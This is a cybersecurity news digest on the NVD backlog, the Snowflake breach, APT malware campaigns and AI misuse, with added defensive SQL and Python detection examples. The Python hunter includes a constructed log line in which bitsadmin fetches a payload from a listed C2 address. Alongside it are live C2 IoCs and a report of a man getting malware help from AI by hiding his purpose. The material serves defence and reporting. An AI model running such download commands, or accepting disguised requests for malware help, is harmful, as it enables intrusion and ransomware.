NIST Hires External Contractor to Help Tackle National Vulnerability Database Backlog
Clearing the National Vulnerability Database Backlog
NIST is responsible for managing entries in the NVD. After being overwhelmed by the volume of entries amid a growing backlog of CVEs that has accumulated since February, the institute has awarded a contract to an external party to aid in its processing efforts. "We are confident that this additional support will allow us to return to the processing rates we maintained prior to February 2024 within the next few months," the agency stated. To further alleviate the backlog, NIST is also working closely with CISA, the Cybersecurity and Infrastructure Security Agency, to improve its overall operations and processes. "We anticipate that this backlog will be cleared by the end of the fiscal year," NIST stated. In its status update, NIST referenced an earlier statement that it was exploring various means to address the increasing volume of vulnerabilities through modernized technology and improvements to its processes.
Source: NIST NVD Status Updates
"Our goal is to build a program that is sustainable for the long term and to support the automation of vulnerability management, security measurement and compliance," the institute said. NIST reaffirmed its commitment to maintaining and modernizing the NVD, stating, "NIST is fully committed to preserving and updating this vital national resource, which is crucial for building trust in information technology and fostering innovation."
CISA's 'Vulnrichment' Initiative
In response to the growing NVD backlog at NIST, CISA launched its own initiative, called "Vulnrichment," to help enrich public CVE records. CISA's Vulnrichment project is designed to complement the work of the originating CNA (Common Vulnerabilities and Exposures Numbering Authority) and reduce the burden on NIST's analysts. CISA said it would use an SSVC decision tree model to categorize vulnerabilities. The agency will consider factors such as exploitation status, technical impact, impact on mission-essential functions, public well-being, and whether exploitation is automatable. CISA welcomes feedback from the IT cybersecurity community on this effort. By providing enriched CVE data, CISA aims to improve the overall quality and usefulness of the NVD for cybersecurity professionals. "For those CVEs that do not already have these fields populated by the originating CNA, CISA will populate the associated ADP container with those values when there is enough supporting evidence to do so," the agency explained. As NIST and CISA work to address the current challenges, they have pledged to keep the community informed of their progress as well as of future modernization plans. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Hacker Links Ticketmaster and Santander Data Leaks to Snowflake Breach
"To date, we do not believe this activity is caused by any vulnerability, misconfiguration, or malicious activity within the Snowflake product," the cloud storage giant said in a statement today. Snowflake's AI Data Cloud platform serves more than 9,000 customers, including major companies such as Adobe, AT&T, Capital One, DoorDash, HP, JetBlue, Mastercard, Micron, NBC Universal, Nielsen, Novartis, Okta, PepsiCo, Siemens, US Foods, Western Union, and Yamaha, among others.
Alleged Snowflake Breach Details
According to cybersecurity firm Hudson Rock, the threat actor claims to have accessed data from additional high-profile companies using Snowflake's services, including Anheuser-Busch, State Farm, Mitsubishi, Progressive, Neiman Marcus, Allstate, and Advance Auto Parts. The method described involved bypassing Okta's authentication by using stolen credentials to log into a Snowflake employee's ServiceNow account. From there, they allegedly generated session tokens to extract data from Snowflake customers. Hudson Rock reported that the threat actor claimed the breach affected up to 400 companies, showing evidence of access to over 2,000 customer instances related to Snowflake's Europe servers.
Extortion Attempt and Malware Involvement
The threat actor claimed to have attempted to extort Snowflake for $20 million to buy back the stolen data, but Snowflake did not respond. Hudson Rock noted that a Snowflake employee was infected with a Lumma-type infostealer in October, which stole their corporate credentials. The malware infection was supported by screenshots shared by the threat actor.
Snowflake Responds
Snowflake has confirmed breaches of customer accounts but denied that any vulnerability or misconfiguration in its products was exploited. The cloud storage company stated that it observed unauthorized access to certain customer accounts, which it said is likely unrelated to any flaws in Snowflake's infrastructure. "We believe this is the result of ongoing industry-wide, identity-based attacks with the intent to obtain customer data. Research indicates that these types of attacks are performed with our customers’ user credentials that were exposed through unrelated cyber threat activity." Snowflake has notified the "limited" number of customers affected by these attacks and urged them to enhance their account security by enabling multi-factor authentication (MFA).
Tools and Indicators of Compromise
The company published a security bulletin containing Indicators of Compromise (IoCs), investigative queries, and guidance for securing affected accounts. One IoC indicates that the threat actors used a custom tool named "RapeFlake" to exfiltrate data from Snowflake's databases. Another showed the use of the "DBeaver Ultimate" data management tool, with logs indicating connections from the "DBeaver_DBeaverUltimate" user agent. Snowflake also shared a query to identify access from suspected clients, along with instructions on how to disable a suspected user. But this might not be enough. A very important step here is: "If you have enabled the ALLOW_ID_TOKEN parameter on your account, the user must be left in the disabled state for 6 hours to fully invalidate any possible unauthorized access via this ID token feature. If the user is re-enabled before this time the attacker may be able to generate a new session using an existing ID token, even after the password has been reset or MFA has been enabled." While a threat actor claims to have breached Snowflake and accessed data from numerous high-profile companies, Snowflake maintains that these breaches resulted from compromised customer accounts rather than any inherent vulnerabilities in its systems. Snowflake continues to investigate the incidents and has taken steps to improve customer account security.
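As an added example (not the query from Snowflake's bulletin), the detection and containment steps described above expressed as SQL against Snowflake's ACCOUNT_USAGE views. The view and column names are assumed from Snowflake's documented schema, and SUSPECT_USER is a placeholder for the account under investigation.

```sql
-- Added example, not Snowflake's own query. Assumes the documented
-- SNOWFLAKE.ACCOUNT_USAGE.SESSIONS and LOGIN_HISTORY views; their data lags
-- live activity by up to a few hours, so confirm against current sessions too.

-- 1. Sessions created by the client applications named as IoCs in the
--    bulletin, joined to the login that created each session so the source
--    IP and the authentication factors used are visible.
SELECT s.created_on,
       s.user_name,
       s.client_application_id,
       l.client_ip,
       l.first_authentication_factor,
       l.second_authentication_factor   -- NULL here means the login used no MFA
FROM   snowflake.account_usage.sessions      AS s
JOIN   snowflake.account_usage.login_history AS l
       ON l.event_id = s.login_event_id
WHERE  s.created_on >= DATEADD(day, -30, CURRENT_TIMESTAMP())
  AND  (   s.client_application_id ILIKE 'DBeaver_DBeaverUltimate%'
        OR s.client_application_id ILIKE 'rapeflake%')
ORDER  BY s.created_on DESC;

-- 2. Check whether cached ID tokens are enabled on the account. If the value
--    is TRUE, a disabled user must stay disabled for 6 hours, as the bulletin
--    excerpt above explains, before re-enabling is safe.
SHOW PARAMETERS LIKE 'ALLOW_ID_TOKEN' IN ACCOUNT;

-- 3. Containment for a suspect account (SUSPECT_USER is a placeholder):
--    disable first, then rotate the password and force a change at next login.
ALTER USER SUSPECT_USER SET DISABLED = TRUE;
ALTER USER SUSPECT_USER SET PASSWORD = '<new-temporary-password>'
                            MUST_CHANGE_PASSWORD = TRUE;

-- 4. Only after the 6-hour window has elapsed (when ALLOW_ID_TOKEN is TRUE)
--    and MFA has been enrolled for the user:
-- ALTER USER SUSPECT_USER SET DISABLED = FALSE;
```

Running step 1 with no client filter and `l.second_authentication_factor IS NULL` lists every recent login that did not use MFA, which is the exposure Snowflake's advice to enable MFA addresses.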
Multiple Vulnerabilities in Carrier's LenelS2 NetBox
Three vulnerabilities were identified in Carrier's product security advisory for NetBox. The most critical of these (CVE-2024-2420) could potentially enable an attacker to circumvent authentication requirements and obtain elevated permissions, presenting a serious risk to enterprises that deploy the tool.
Source: Carrier Product Security Advisory
Successful compromise could allow an attacker to install programs; view, edit, or delete data from the platform; or create new user accounts with full privileges. However, this depends on the access level of the accounts compromised in an attack; the impact could be lower on systems configured with a low level of user access. The vulnerabilities affect all LenelS2 NetBox versions prior to 5.6.2. The identified vulnerabilities are as follows:
- CVE-2024-2420 (CVSS v3.1 Base Score 9.8, Critical): A vulnerability involving a hard-coded password in the system that could permit an attacker to bypass authentication requirements.
- CVE-2024-2421 (CVSS v3.1 Base Score 9.1, Critical): An unauthenticated remote code execution vulnerability that could permit an attacker with elevated permissions to run malicious commands.
- CVE-2024-2422 (CVSS v3.1 Base Score 8.8, High): An authenticated remote code execution vulnerability that could permit an attacker to execute malicious commands.
Vulnerability Remediation
Carrier has addressed these vulnerabilities in its latest release, NetBox version 5.6.2, and has advised customers to upgrade immediately by contacting their authorized NetBox installer. As mitigation, Carrier also advised customers to follow the recommended deployment guidelines, which are detailed in its NetBox hardening guide, accessible through NetBox's built-in help menu. The Center for Internet Security has advised customers to take additional measures such as applying appropriate updates to NetBox systems, applying the principle of least privilege to user accounts, rigorously scanning for vulnerabilities, and isolating critical systems, functions, or resources. The lack of basic security safeguards, along with poor coding practices such as hard-coded authentication tokens and improper input sanitization, raises concerns about the use of NetBox to guard physical access to important business and government areas or critical infrastructure. While there are no confirmed reports of the NetBox vulnerabilities being exploited in the wild, their severity marks them as an important security consideration, as countless organizations could be at risk of devastating attacks.
Copilot+ Recall is ‘Dumbest Cybersecurity Move in a Decade’: Researcher
Copilot Recall Privacy and Security Claims Challenged
In a long Mastodon thread on the new feature, Windows security researcher Kevin Beaumont wrote, “I’m not being hyperbolic when I say this is the dumbest cybersecurity move in a decade. Good luck to my parents safely using their PC.” In a blog post on Recall security and privacy, Microsoft said that processing and storage are done only on the local device and encrypted, but even Microsoft’s own explanations raise concerns: “Note that Recall does not perform content moderation. It will not hide information such as passwords or financial account numbers. That data may be in snapshots that are stored on your device, especially when sites do not follow standard internet protocols like cloaking password entry.” Security and privacy advocates take issue with assertions that the data is stored securely on the local device. If someone has a user’s password, or if a court orders that data be turned over for legal or law enforcement purposes, the amount of data exposed could be much greater with Recall than would otherwise be exposed. Domestic abuse situations could be worsened. And hackers, malware and infostealers will have access to vastly more data than they would without Recall. Beaumont said the screenshots are stored in a SQLite database, “and you can access it as the user including programmatically. It 100% does not need physical access and can be stolen.” He posted a video (republished below) he said was of two Microsoft engineers gaining access to the Recall database folder with apparent ease, “with SQLite database right there.”
Does Recall Have Cloud Hooks?
Beaumont also questioned Microsoft’s assertion that all this is done locally. “So the code underpinning Copilot+ Recall includes a whole bunch of Azure AI backend code, which has ended up in the Windows OS,” he wrote on Mastodon. “It also has a ton of API hooks for user activity monitoring. It opens a lot of attack surface. ... They really went all in with this and it will have profound negative implications for the safety of people who use Microsoft Windows.”
Data May Not Be Completely Deleted
And sensitive data deleted by users will still be saved in Recall screenshots. “There's no feature to delete screenshots of things you delete while using your PC,” Beaumont said. “You would have to remember to go and purge screenshots that Recall makes every few seconds. If you or a friend use disappearing messages in WhatsApp, Signal etc, it is recorded regardless.” One commenter said Copilot Recall seems to raise compliance issues too, in part by creating additional unnecessary data that could survive deletion requests. “[T]his comprehensively fails PCI and GDPR immediately and the SOC2 controls list ain't looking so good either,” the commenter said. Leslie Carhart, Director of Incident Response at Dragos, replied that “the outrage and disbelief are warranted.” A second commenter noted, “GDPR has a very simple concept: Data Minimization. Quite simply, only store data that you actually have a legitimate, legal purpose for; and only for as long as necessary. Right there, this fails in spectacular fashion on both counts. It's going to store vast amounts of data for no specific purpose, potentially for far longer than any reasonable use of that data.” It remains to be seen if Microsoft will make any modifications to Recall to quell concerns before it officially ships. If not, security and privacy experts may find themselves busier than ever.
Andariel APT Using DoraRAT and Nestdoor Malware to Spy on South Korean Businesses
Malware Used by Andariel APT in this Campaign
The first of the two malware strains used in the latest campaign was Nestdoor, a remote access trojan (RAT) that has been active since May 2022. This RAT can execute commands from the threat actor to control infected systems. Nestdoor has been found in numerous Andariel attacks, including those exploiting the VMware Horizon product’s Log4Shell vulnerability (CVE-2021-44228). The malware is developed in C++ and features capabilities such as file upload/download, reverse shell, command execution, keylogging, clipboard logging, and proxy functionality. A specific case in 2022 involved Nestdoor being distributed alongside TigerRAT using the same command and control (C&C) server. Another incident in early 2024 saw Nestdoor disguised as an OpenVPN installer; this version maintained persistence via the Task Scheduler and communicated with a C&C server. The Andariel APT has been developing new malware strains in the Go language for each campaign. Dora RAT, a recent discovery, is one such malware strain. The backdoor supports reverse shell and file transfer operations and exists in two forms: a standalone executable and a process injected into "explorer.exe." The latter variant uses an executable in WinRAR SFX format, which includes an injector malware. The Dora RAT has been signed with a valid certificate from a UK software developer in an attempt to make it look legitimate.
Additional Malware Strains
- Keylogger/Cliplogger: Performs basic functions like logging keystrokes and clipboard contents, stored in the “%TEMP%” directory.
- Stealer: It is designed to exfiltrate files from the system, potentially handling large quantities of data.
- Proxy: Includes both custom-created proxy tools and open-source Socks5 proxy tools. Some proxies are similar to those used by the Lazarus group in past attacks.
IoCs to Watch for Signs of Andariel APT Attacks
The researchers shared IoCs to monitor for attacks from the Andariel APT group, including MD5 hashes of the Nestdoor, Dora RAT, keylogger/cliplogger and stealer samples, and the associated C&C addresses.
Pirated Copies of Microsoft Office Used to Distribute Frequent Malware in South Korea
Malicious Pirated Copies of Microsoft Office and Other Programs
Researchers from AhnLab discovered that attackers have been creating and distributing malicious copies of popular utility software. These copies were distributed through common file-sharing platforms and torrent websites. The operation takes advantage of users looking to obtain free copies of software without paying the required license fee. When downloaded and executed, the programs usually appear as convincing cracked installers or activators for programs such as Microsoft Office or the Hangul word processor. While the initial downloader was developed in .NET, the attackers appear to have moved to more obfuscated techniques. The malware retrieves its instructions for the next stage of the attack from Telegram or Mastodon channels operated by the attackers. These channels contain encrypted Base64 strings that lead to Google Drive or GitHub URLs hosting the malicious payloads. These payloads are downloaded and decrypted using the legitimate 7-Zip archive utility, which is commonly present on systems and operates with a low footprint. Researchers discovered that the decrypted payloads contained PowerShell instructions to load and execute additional malware components on the victim's system. The malware strains loaded on the infected systems include:
- OrcusRAT: A remote access trojan with extensive capabilities like keylogging, webcam access, and remote screen control.
- XMRig Cryptominer: Configured to stop mining when resource-intensive apps are running to avoid detection. Also kills competing miners and security products.
- 3Proxy: Injects itself into legitimate processes to open a backdoor proxy server.
- PureCrypter: Fetches and runs additional malicious payloads from attacker-controlled servers.
- AntiAV: Disrupts security products by repeatedly modifying their configuration files.
Continuous Reinfection and Distribution
The researchers said systems may remain infected even after the initial infection has been removed, due to the malware's ability to update itself as well as download additional malware payloads. They stated that the attackers had distributed new malware to affected systems multiple times each week to bypass file-based detection. The researchers said the number of compromised systems continued to increase, as the registered task scheduler entries loaded additional malicious components on affected systems despite the removal of the previous underlying malware. The researchers advised South Korean users to download software and programs from their official sources rather than file-sharing sites. Users who suspect that their systems may already be infected should remove the associated task scheduler entries to block the download of additional malware components, and update their antivirus software to the latest available versions. The researchers have additionally shared indicators of compromise, the detection categories flagged in the attack, MD5 hashes of files used in the attack, associated C&C server addresses, and suspicious behaviors observed during the attack.
Hawk Eye App Data Breach in India: Personal Data of Thousands Exposed in Telangana State
Login Data Exposes Hawk Eye App Data Breach
The Hawk Eye App was launched by the Telangana Police in December 2014 for both Android and iPhone users as part of its initiative to become a citizen-friendly and responsive police force. Citizens were encouraged to use the app to report on a wide range of activities, including traffic violations, information about criminals, violations by police, and crime against women, and also to pass on suggestions to the police for improved policing and to credit the good work done by them. A key feature of the app is the SOS button for accessing help in case of emergencies. When registering with the app, users are required to share their personal details, including name, email ID, mobile number and password. The app currently has a 4.4 rating on the Google Play Store, with more than 500,000 downloads on Android alone.
Source: Hawk Eye App on Android
Hawk Eye App Data Breach Samples
A few of the samples exposed by the threat actor revealed that one woman had filed a complaint on the Hawk Eye App stating that a man had initially promised to marry her and that she was now facing threats from him and his family. Alarmingly, the leaked data revealed her name, mobile number, location, and the date and time of the complaint, potentially putting her at risk. In several other cases, citizens had filed complaints of traffic violations, and the data they had used to log in to the app, including name, email address, and phone number, was revealed in the breach. What is noteworthy about these examples is that all of these users had filed complaints in May 2024, which suggests that the data from the Hawk Eye App was hacked this month.
Cops Wary of Hawk Eye App Data Breach
When The Cyber Express downloaded the “Hawk Eye -Telangana Police” app on Android on May 31, the app remained non-functional after the tester entered the primary details. Surprisingly, the app did not appear when the user tried to download it from the Apple App Store. Sources in the Telangana Police have confirmed to The Cyber Express that there was a failure to upgrade the app and that the process of applying an updated patch is ongoing. Police sources in the Telangana IT wing shared that they were working with vendors to install an updated patch. This, the police officials shared, could be a reason for the app's data being breached. Additional Director General of Police (Technical Services) VV Srinivasa Rao of the Telangana Police shared that the task of upgrading Hawk Eye has been given to developers and that it should be available for the latest Android versions shortly. DGP Shikha Goel, who is also the director of the Telangana State Cyber Security Bureau, was unavailable for comment. We will update this story as we get more information.
RedTail Cryptominer Evolves with Palo Alto PAN-OS CVE-2024-3400 Vulnerability
RedTail Cryptominer Leverages Private Cryptomining Pools
According to Akamai, the operators behind the RedTail cryptominer have chosen to use "private cryptomining pools" to gain more control over their mining activities, even though this comes with higher operational and financial costs. The tactics used in this campaign closely resemble those used by the Lazarus group, as per the research. By using private pools, the attackers gain better control and security over their operations, as other prominent threat groups have. This shift towards private pools suggests a more coordinated and intentional strategy in cryptomining activities, which raises the possibility of involvement by nation-state actors.
RedTail Cryptominer: Sneaky and Stealthy
The RedTail cryptominer is no amateur when it comes to flying under the radar and maintaining its grip on compromised systems. It employs anti-research measures and wraps the XMRig cryptomining code in extra layers of encryption and logic. The malware also optimizes its mining operations to be as efficient and profitable as possible. In addition to exploiting the PAN-OS CVE-2024-3400 vulnerability, the actors behind RedTail are targeting a variety of other vulnerabilities across different devices and platforms, including exploits aimed at SSL-VPNs, IoT devices, web applications, and security devices such as Ivanti Connect Secure.
How to Use the Akamai App & API Protector?
Akamai recommends its App & API Protector for additional protection, and advises organizations to identify all of their Palo Alto devices and patch them to prevent RedTail infections. Users can also harden their devices against web platform attacks, command injection, and local file inclusion. Akamai again notes that, rather than relying solely on the PAN-OS CVE-2024-3400 vulnerability, the developers of RedTail take advantage of several other vulnerabilities in different platforms and devices, including SSL VPNs, IoT products, web apps, and security appliances such as Ivanti Connect Secure.
Alert: Kimsuky Hacking Group Targets Human Rights Activists
As per recent reports, a new social engineering attack attributed to the North Korea-linked Kimsuky hacking group is targeting human rights activists using fake Facebook accounts. This tactic, involving fictitious identities, marks a significant shift from the group's typical email-based spear-phishing strategy. According to a report by South Korean cybersecurity firm Genians, the attackers pose as […]
The post Alert: Kimsuky Hacking Group Targets Human Rights Activists appeared first on TuxCare.
The post Alert: Kimsuky Hacking Group Targets Human Rights Activists appeared first on Security Boulevard.
UnitedHealth’s Leadership Criticized by Senator Wyden for Appointment of Underqualified CISO
Broader Context of Cyberattack on Change Healthcare
At the heart of the criticism is the appointment of a Chief Information Security Officer (CISO) who had no prior full-time experience in cybersecurity before assuming the role in June 2023. This, according to Wyden, epitomizes the corporate negligence that has placed countless stakeholders at risk. Wyden argues that Martin's appointment exemplifies a broader pattern of poor decision-making by UHG’s senior executives and board of directors, who should be held accountable for the company’s cybersecurity lapses. The comparison to SolarWinds is particularly telling. The SolarWinds incident exposed vulnerabilities in software supply chains, leading to widespread consequences across multiple sectors. Similarly, UHG's data breach, if proven to result from preventable lapses, highlights the critical need for stringent cybersecurity practices in healthcare, an industry that handles sensitive personal and medical data.
The Incident and Initial Reactions
The incident in question involved hackers exploiting a remote access server at Change Healthcare, which lacked multi-factor authentication (MFA). This basic cybersecurity lapse allowed the attackers to gain an initial foothold, leading to a ransomware infection that crippled UHG’s operations. During testimony before the Senate Finance Committee on May 1, 2024, UHG CEO Andrew Witty admitted that the company’s MFA policy was not uniformly implemented across all external servers. Witty's revelations highlighted a broader issue of inadequate cybersecurity defenses at UHG, despite the industry's reliance on MFA as a fundamental safeguard.
Industry Standards and Regulatory Expectations
Wyden’s letter points out that the Federal Trade Commission (FTC) has mandated MFA for financial services companies under the Safeguards Rule and has enforced its use in cases against companies like Drizly and Chegg. These precedents establish MFA as a non-negotiable standard for protecting consumer data. UHG's failure to implement this basic security measure on all its servers is a glaring oversight, suggesting a disconnect between its stated policies and actual practices. Moreover, Wyden highlights the necessity of multiple lines of defense in cybersecurity. The fact that hackers could escalate their access from one compromised server to the entire network indicates a lack of network segmentation and other best practices designed to contain breaches. This deficiency exacerbates the initial failure to secure remote access points.
Consequences and Broader Implications
The implications of UHG’s cybersecurity failures are profound. The immediate aftermath saw significant disruptions, with some of UHG's systems taking weeks to restore. Witty admitted that while cloud-based systems were quickly recovered, many critical services running on UHG's own servers were not engineered for rapid restoration. This lack of resilience in UHG’s infrastructure planning highlights a failure to anticipate and mitigate the risk of ransomware attacks, a known and escalating threat. Wyden’s letter also addresses the financial fallout. UHG has already estimated the breach's cost at over a billion dollars, reflecting the significant economic impact of the cyberattack. This financial burden, coupled with negative media coverage, exposes UHG to substantial political and market risks. The case echoes the SEC’s stance in the SolarWinds case, where cybersecurity practices were deemed crucial for investor decisions. Investors in UHG would similarly consider enhanced cybersecurity practices essential, given the potential for massive breaches to affect stock value and company reputation.
Accountability and Regulatory Action
Senator Wyden calls for the FTC and SEC to investigate UHG’s cybersecurity and technology practices, aiming to determine if any federal laws were violated and to hold senior officials accountable. This push for accountability highlights the role of corporate governance in cybersecurity. The Audit and Finance Committee of UHG’s board, responsible for overseeing cybersecurity risks, is criticized for its apparent failure to fulfill its duties. Wyden suggests that the board's lack of cybersecurity expertise likely contributed to the oversight failures, a critical point in an era where cybersecurity threats are increasingly sophisticated and pervasive.
OpenAI Exposes AI-Powered State Actors in Global Influence Operations
Threat Actors Employ AI and Covert Influence Operations
These threat actors, operating from Russia, China, Iran, and a commercial entity based in Israel, used generative AI to support a series of covert influence operations. The operations, documented and analyzed in the report, illustrate how malicious actors are folding AI tooling into their campaigns, OpenAI says. One of the operations highlighted in the report is "Bad Grammar," a previously undisclosed campaign originating from Russia. Operating primarily on the messaging platform Telegram, Bad Grammar sought to disseminate politically charged content targeting audiences in Ukraine, Moldova, the Baltic States, and the United States. Despite its geographic reach, the operation was marked by conspicuous grammatical errors in its AI-generated posts, which undermined its credibility. Similarly, the report sheds light on the activities of "Doppelganger," a persistent threat actor linked to Russia, engaged in disseminating anti-Ukraine propaganda across various online channels. Employing a hybrid approach that combines AI-generated content with traditional formats such as memes sourced from the internet, Doppelganger exemplifies the fusion of old and new tactics in these campaigns.
Influencing Geographical Politics
The report also highlights covert influence campaigns linked to China, Iran, and a commercial group in Israel, in addition to those connected with Russia. These operations, known by names like "Spamouflage" and "STOIC," use various strategies to push their specific agendas. Their activities include promoting pro-China narratives while attacking its detractors, as well as creating content focused on the Gaza conflict and the elections in India. Despite the diverse origins and tactics employed by these threat actors, the report highlights common trends that shed light on the current state of covert influence. One such trend is the pervasive use of AI models to augment productivity and streamline content generation. From generating multilingual articles to automating the creation of website tags, AI serves as a force multiplier for actors seeking to manipulate digital discourse. The report also examines the interplay between AI-driven strategies and human error, emphasizing that the human operators behind these campaigns remain fallible: some published AI-generated content still carried telltale signs of automation, exposing the operation behind it.
Researchers Uncover New Data Theft Campaign of Advanced Threat Actor ‘LilacSquid’
Use of Open-Source Tools and Customized Malware
LilacSquid gains initial access by exploiting vulnerable application servers exposed to the internet and by using compromised remote desktop protocol (RDP) credentials. It then deploys a mix of open-source tools and customized malware: MeshAgent, an open-source remote management tool; SSF; a customized build of QuasarRAT that researchers refer to as "PurpleInk"; and the loaders InkBox and InkLoader. MeshAgent and PurpleInk serve as the primary implants.
LilacSquid's Long-Term Access for Data Theft through Persistence
Talos assessed with high confidence that LilacSquid has been active since at least 2021, focusing on establishing long-term access to compromised organizations to siphon valuable data to attacker-controlled servers. The campaign has successfully compromised entities in Asia, Europe, and the United States across sectors such as pharmaceuticals, oil and gas, and technology. LilacSquid uses two primary infection chains: exploiting vulnerable web applications and using compromised RDP credentials. [Figure: LilacSquid Initial Access and Activity. (Credit: Cisco Talos)] Once a system is compromised through a vulnerability in an internet-facing device, LilacSquid deploys multiple access tools, including MeshAgent, SSF, InkLoader, and PurpleInk. [Figure: LilacSquid's Lateral Movement via RDP. (Credit: Cisco Talos)] MeshAgent, downloaded with the bitsadmin utility, connects to its command and control (C2) server, conducts reconnaissance, and activates other implants. InkLoader, a .NET-based malware loader, is used instead when RDP credentials have been compromised; it persists across reboots and executes PurpleInk, with the infection chain tailored for remote desktop sessions.
PurpleInk Implant of LilacSquid
PurpleInk, derived from QuasarRAT, has been customized extensively since 2021. "Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk being actively developed starting in 2021 and continuing to evolve its functionalities separate from its parent malware family," Talos wrote. It features robust remote access capabilities, including process enumeration, file manipulation, system information gathering, remote shell access, and proxy server communication. Different variants of PurpleInk exhibit varying functionality, with some stripped-down versions retaining only core capabilities to evade detection. InkBox, an older loader used by LilacSquid, reads from a hardcoded file path on disk, decrypts its contents, and runs PurpleInk. Since 2023, LilacSquid has modularized the infection chain, with PurpleInk running as a separate process via InkLoader. [Figure: PurpleInk Activation Chain (Credit: Cisco Talos)] Post-exploitation, MeshAgent activates other tools like SSF and PurpleInk. MeshAgent, configured with MSH files, allows operators to control infected devices extensively, managing files, viewing and controlling desktops, and gathering device information.
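The chain above (MeshAgent fetched with bitsadmin, beaconing to C2, PurpleInk written to disk) can be hunted for with the indicators the article publishes. What follows is an added example, not Cisco Talos tooling: it refangs the listed C2 addresses, parses constructed Sysmon-style key=value events (the field names and the sample lines are assumptions made for this example, not real telemetry), and flags hosts that show both the download stage and a C2 connection, since bitsadmin alone has legitimate uses.

```python
"""Hunt for the LilacSquid chain described above in constructed log data.

Added example, not Cisco Talos code. The events below are constructed for
this example in a Sysmon-style key=value layout; the field names are an
assumption. The indicators are the ones the article lists: the PurpleInk
SHA-256 and the four defanged C2 addresses.
"""
import hashlib
import re

# Indicators from the article (defanged form kept as published).
PURPLEINK_SHA256 = "2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8"
DEFANGED_C2 = [
    "67[.]213[.]221[.]6",
    "192[.]145[.]127[.]190",
    "45[.]9[.]251[.]14",
    "199[.]229[.]250[.]142",
]


def refang(ioc: str) -> str:
    """'67[.]213[.]221[.]6' -> '67.213.221.6' so it can match real log fields."""
    return ioc.replace("[.]", ".")


C2_IPS = {refang(ip) for ip in DEFANGED_C2}

# key=value pairs; values containing spaces are double-quoted.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}


def sha256_of_file(path: str) -> str:
    """Hash a file on disk in chunks, for checking a suspect binary by hand."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


# Constructed sample events (assumed layout, not real telemetry).
SAMPLE_EVENTS = [
    'ts=2024-05-30T10:01:02Z host=web01 event=ProcessCreate image=C:\\Windows\\System32\\bitsadmin.exe '
    'cmdline="bitsadmin /transfer job /download /priority high http://67.213.221.6/agent.exe C:\\ProgramData\\agent.exe"',
    'ts=2024-05-30T10:01:05Z host=web01 event=NetworkConnect image=C:\\ProgramData\\agent.exe dst=67.213.221.6 dport=443',
    'ts=2024-05-30T10:03:00Z host=web01 event=FileCreate path=C:\\ProgramData\\svc.exe '
    'sha256=2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8',
    'ts=2024-05-30T10:05:00Z host=web02 event=NetworkConnect image="C:\\Program Files\\Mozilla Firefox\\firefox.exe" dst=93.184.216.34 dport=443',
    'ts=2024-05-30T10:06:00Z host=web02 event=ProcessCreate image=C:\\Windows\\System32\\bitsadmin.exe cmdline="bitsadmin /list"',
]


def detect(lines):
    """Return (host, rule, detail) tuples for the three behaviours the article
    describes: bitsadmin fetching a payload over HTTP(S), a connection to a
    listed C2 address, and a file whose hash matches PurpleInk."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        host, kind = ev.get("host", "?"), ev.get("event")
        if kind == "ProcessCreate" and ev.get("image", "").lower().endswith("bitsadmin.exe"):
            cmd = ev.get("cmdline", "")
            # '/transfer' plus a URL is the download path MeshAgent arrived by.
            if "/transfer" in cmd.lower() and re.search(r"https?://", cmd, re.I):
                findings.append((host, "bitsadmin_download", cmd))
        elif kind == "NetworkConnect" and ev.get("dst") in C2_IPS:
            findings.append((host, "c2_connection", ev["dst"]))
        elif kind == "FileCreate" and ev.get("sha256", "").lower() == PURPLEINK_SHA256:
            findings.append((host, "purpleink_hash", ev.get("path", "")))
    return findings


def hosts_with_chain(findings):
    """Hosts showing both the download stage and a C2 connection; a stronger
    signal than any single hit."""
    by_host = {}
    for host, rule, _ in findings:
        by_host.setdefault(host, set()).add(rule)
    return {h for h, rules in by_host.items()
            if {"bitsadmin_download", "c2_connection"} <= rules}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for hit in hits:
        print(hit)
    print("hosts with full chain:", hosts_with_chain(hits))
```

Swap `SAMPLE_EVENTS` for a real export and adjust the field names to your telemetry; the refanged `C2_IPS` set and the hash comparison work unchanged against proxy, firewall or EDR data.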
Parallels with North Korean APT Groups
The tactics, techniques, and procedures (TTPs) used in this campaign show similarities to those of North Korean APT groups, such as Andariel and Lazarus. Andariel is known for using MeshAgent to maintain post-compromise access, while Lazarus extensively employs SOCKS proxy and tunneling tools, along with custom malware, to create channels for secondary access and data exfiltration. LilacSquid has similarly deployed SSF and other malware to establish tunnels to its remote servers. The LilacSquid campaign highlights the persistent and evolving threat posed by sophisticated APT actors. By combining open-source tools with customized malware, LilacSquid infiltrates and maintains long-term access to diverse organizations worldwide. IoCs to detect LilacSquid's PurpleInk infection:
PurpleInk (SHA-256): 2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8
Network IOCs
67[.]213[.]221[.]6
192[.]145[.]127[.]190
45[.]9[.]251[.]14
199[.]229[.]250[.]142
Japanese Man Arrested for GenAI Ransomware as AI Jailbreak Concerns Grow
AI Jailbreak Tools and Methods Unclear
News reports on Hayashi’s arrest have been lacking in details on the tools and methods he used to create the ransomware. The Japan Times reported that Hayashi, a former factory worker, “is not an expert on malware. He allegedly learned online how to ask AI tools questions that would elicit information on how to create malware.” Hayashi came under suspicion after police arrested him in March “for allegedly using fake identification to obtain a SIM card registered under someone else's name,” the paper reported. The Japan News, which reported that Hayashi is unemployed, said police found “a homemade virus on a computer” following the March arrest. The News said police suspect he “used his home computer and smartphone to combine information about creating malware programs obtained after giving instructions to several generative AI systems in March last year.” Hayashi “allegedly gave instructions to the AI systems while concealing his purpose of creating the virus to obtain design information necessary for encrypting files and demanding ransom,” the News reported. “He is said to have searched online for ways to illegally obtain information.” Hayashi reportedly admitted to charges during questioning, and told police, “I wanted to make money through ransomware. I thought I could do anything if I asked AI.” There have been no reports of damage from the ransomware he created, the News said.LLM Jailbreak Research Heats Up
